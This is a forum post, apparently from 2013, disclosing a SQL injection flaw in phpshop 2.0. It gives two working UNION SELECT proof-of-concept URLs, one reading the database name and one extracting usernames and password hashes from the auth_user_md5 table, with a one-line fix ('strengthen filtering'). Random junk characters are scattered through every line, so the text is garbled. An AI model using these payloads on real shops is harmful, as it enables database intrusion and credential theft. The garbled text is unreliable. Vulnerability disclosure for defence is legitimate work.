标题 : phpshop 2.0 SQL Injection Vulnerability9 a m! }1 ]6 K2 L# a& D# F, W
$ q: R5 R- Q( Q! a1 ]$ w b
作者 : By onestree+ E8 r% K, t( _/ P, j
下载地址 : http://code.google.com/p/phpshop/downloads/list) N g R0 S3 s' h
测试地址: windows 7 / ubuntu( B6 R! _) u2 h: c! x
5 ?7 m, H: m5 Y. P2 d7 y5 v9 M
4 e# r0 z- ^+ |0 HSQLi p0c:7 c; h; F$ Y6 s
4 u6 { o4 Y0 F4 z3 i2 L
==================
! T R+ ?3 Z) m; U / U- s( E8 y- {9 O
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'# x1 c& H/ P/ k* B. x
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --% \! S! \. c( u
+ [( n9 ]6 ~) I. j. Ahttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( ?$ s" f, O* i% E& T9 r! w/ _
3 {8 k# X/ x2 L7 @修复:( Y; Q9 u9 k* \& j
加强过滤6 h5 J1 B7 c5 L" c
, k+ q2 h2 p( k M. N k' b% K4 c
, Y$ P, ~" W) ^
|
发表于 2013-1-18 18:24:10
收藏
支持
反对